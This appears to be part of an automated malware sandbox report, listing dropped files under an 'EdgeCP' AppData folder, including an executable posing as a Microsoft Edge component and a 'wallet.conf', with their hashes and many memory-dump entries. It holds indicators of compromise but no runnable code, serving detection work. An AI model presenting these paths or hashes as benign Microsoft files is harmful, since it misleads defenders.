2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\heur.conf
MD5
8d420eababb7173b1abb86df8fcbd30c

SHA1
11b77c1218bf308d47bb4b89600d3f72af82d525

SHA256
1ccfc7778c058e57f64c2e6b985a2c3ea606f0c34b06ac2f4cd2bcf9706d05ba

SHA512
d863762d88eef79119430f81c77291de5dac47a5465a049843366506caa1fe6dfff96c4179b4ae2f9e919a799e138e3f7f61f77a2adc35eb82a5be1c7892628d

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\id.conf
MD5
d7d2374b845068f4d7239b2d3e7b4f87

SHA1
891bbd590ce0ae7647c74f2bb50c52472559bebb

SHA256
b0aba6eb8b61f27089687eef9b3340d8752fbf6474c542e6ea8d2618c999d0fb

SHA512
d291ca593bd0706b318ccb27bb6b22c1cfe27ac90ea060e15b6a429141e94131b5bfef5e422acacf6486924042992b7d0ab9576e0aa97e7ba6fee33830401b14

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.conf
MD5
69bf7238c8e32793411515d8ca5926a9

SHA1
d6918bcceab927a036b760a82cadd340d83b8ed1

SHA256
57df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66

SHA512
4a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3

Download Submit
memory/196-220-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/196-217-0x0000000000401108-mapping.dmp

Download
memory/408-232-0x0000000000000000-mapping.dmp

Download
memory/592-200-0x0000000000401074-mapping.dmp

Download
memory/592-204-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/656-212-0x0000000000401000-mapping.dmp

Download
memory/656-218-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1076-149-0x0000000000000000-mapping.dmp

Download
memory/1280-226-0x0000000000401000-mapping.dmp

Download
memory/1280-230-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1524-209-0x000000000044412E-mapping.dmp

Download
memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/2080-131-0x0000000000000000-mapping.dmp

Download
memory/2140-177-0x0000000000000000-mapping.dmp

Download
memory/2236-214-0x00000000004010B8-mapping.dmp

Download
memory/2236-221-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2264-206-0x0000000000413E10-mapping.dmp

Download
memory/2264-208-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2272-161-0x0000000000000000-mapping.dmp

Download
memory/2300-196-0x00000000004466F4-mapping.dmp

Download
memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/2308-128-0x0000000003930000-0x0000000003931000-memory.dmp

Filesize
4KB

Download
memory/2308-136-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/2308-181-0x0000000003933000-0x0000000003934000-memory.dmp

Filesize
4KB

Download
memory/2308-138-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/2308-178-0x0000000009CE0000-0x0000000009CE1000-memory.dmp

Filesize
4KB

Download
memory/2308-176-0x0000000009830000-0x0000000009831000-memory.dmp

Filesize
4KB

Download
memory/2308-171-0x000000007EA40000-0x000000007EA41000-memory.dmp

Filesize
4KB

Download
memory/2308-170-0x0000000008B40000-0x0000000008B41000-memory.dmp

Filesize
4KB

Download
memory/2308-163-0x00000000097A0000-0x00000000097D3000-memory.dmp

Filesize
204KB

Download
memory/2308-132-0x0000000007FC0000-0x0000000007FC1000-memory.dmp

Filesize
4KB

Download
memory/2308-118-0x0000000000000000-mapping.dmp

Download
memory/2308-125-0x0000000007990000-0x0000000007991000-memory.dmp

Filesize
4KB

Download
memory/2308-130-0x0000000003932000-0x0000000003933000-memory.dmp

Filesize
4KB

Download
memory/2308-134-0x0000000008240000-0x0000000008241000-memory.dmp

Filesize
4KB

Download
memory/2672-233-0x0000000000000000-mapping.dmp

Download
memory/2792-145-0x0000000000000000-mapping.dmp

Download
memory/2852-160-0x0000000008930000-0x0000000008931000-memory.dmp

Filesize
4KB

Download
memory/2852-127-0x00000000008D0000-0x00000000008D1000-memory.dmp

Filesize
4KB

Download
memory/2852-143-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

Filesize
4KB

Download
memory/2852-117-0x0000000000000000-mapping.dmp

Download
memory/2852-141-0x00000000074D0000-0x00000000074D1000-memory.dmp

Filesize
4KB

Download
memory/2852-129-0x00000000008D2000-0x00000000008D3000-memory.dmp

Filesize
4KB

Download
memory/2852-157-0x0000000009190000-0x0000000009191000-memory.dmp

Filesize
4KB

Download
memory/2852-123-0x0000000001070000-0x0000000001071000-memory.dmp

Filesize
4KB

Download
memory/2852-146-0x0000000007C20000-0x0000000007C21000-memory.dmp

Filesize
4KB

Download
memory/2852-205-0x00000000008D3000-0x00000000008D4000-memory.dmp

Filesize
4KB

Download
memory/2944-192-0x0000000000000000-mapping.dmp

Download
memory/3180-140-0x0000000000000000-mapping.dmp

Download
memory/3544-231-0x0000000000000000-mapping.dmp

Download
memory/3584-225-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/3584-222-0x0000000000401000-mapping.dmp

Download
memory/3796-229-0x0000000000000000-mapping.dmp

Download
memory/4084-114-0x0000000000000000-mapping.dmp

Download